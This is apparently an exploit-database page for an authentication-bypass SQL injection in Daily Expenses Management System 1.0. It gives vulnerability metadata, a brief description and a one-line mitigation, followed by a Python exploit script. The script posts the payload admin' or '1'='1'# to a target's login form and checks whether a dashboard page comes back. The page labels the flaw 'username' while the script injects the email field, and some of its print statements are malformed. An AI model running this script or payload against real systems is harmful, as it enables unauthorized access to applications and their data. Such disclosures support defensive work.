Daily Expenses Management System 1.0 - 'username' SQL Injection

vendor:

Daily Expenses Management System

by:

Daniel Ortiz

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Daily Expenses Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:daily_expenses_management_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: XAMPP Version 5.6.40 / Windows 10

2020

Daily Expenses Management System 1.0 – ‘username’ SQL Injection

Daily Expenses Management System 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to bypass the authentication process and gain access to the application. This vulnerability is due to the lack of proper input validation on the application side. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by sending a specially crafted payload to the application.

Mitigation:

Input validation should be implemented to prevent SQL injection attacks. All user input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-08-01
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link:  https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html

import sys
import requests
import urllib3
import re
import time


urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)

def make_request(url, payload):
    
    p = {"http":"127.0.0.1:8080", "https": "127.0.0.1:8080"}
    s = requests.Session()
    r = s.post(url, data=payload, proxies=p)
    return r

if __name__ == '__main__':

    if len(sys.argv) != 2:
        print("[*] Daily Expenses Management System | username SQL injection")
        print("[*] usage: %s  TARGET" % sys.argv[0])
        print("[*] e.g: %s  192.168.0.10" % sys.argv[0]) 
        sys.exit(-1)

    TARGET = sys.argv[1]
    LOGIN_FORM = "http://%s/dets/" % TARGET
    
    
    # Step 1 - Bypass login form

    url = LOGIN_FORM
    p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'} 
    r = make_request(url, p1)
    print("[+] Endpoint: %s") % LOGIN_FORM
    print("[+] Making requests with payload: %s") % p1

    if re.findall('Dashboard', r.text):
        print("[+] Target vulnerable")
    else:
        print("[-] Error !!!")